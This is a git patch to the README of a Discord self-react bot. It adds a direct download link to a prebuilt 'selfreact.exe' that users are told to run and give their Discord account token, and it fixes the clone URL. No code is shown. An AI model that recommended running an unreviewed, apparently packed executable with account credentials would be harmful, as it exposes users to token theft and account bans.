From ef1095a7f5b9e429f8166102e530dd209dac2753 Mon Sep 17 00:00:00 2001 From: fatal <101256362+7cf@users.noreply.github.com> Date: Mon, 5 Aug 2024 20:58:12 -0400 Subject: [PATCH] Update README.md --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 5095413..82a9eac 100644 --- a/README.md +++ b/README.md @@ -24,7 +24,7 @@ Mar's Self Bot 1.0 is a self-bot for Discord designed to automatically react to ### Exe Method -- **Download and Run**: Download `selfreact.exe`, run the application, enter your token, and press "Run" to start the bot. (Feel free to decode it if you wish to explore the code.) +- **Download and Run**: Download [**selfreact.exe**](https://github.com/7cf/Discord-Self-React-Bot/releases/download/v1.0/selfreact.exe), run the application, enter your token, and press "Run" to start the bot. (Feel free to decode it if you wish to explore the code.) ### Prerequisites @@ -35,7 +35,7 @@ Mar's Self Bot 1.0 is a self-bot for Discord designed to automatically react to 1. **Clone the Repository** ```sh - git clone https://github.com/your-username/Discord-Self-React-Bot.git + git clone https://github.com/7cf/Discord-Self-React-Bot.git cd Discord-Self-React-Bot ```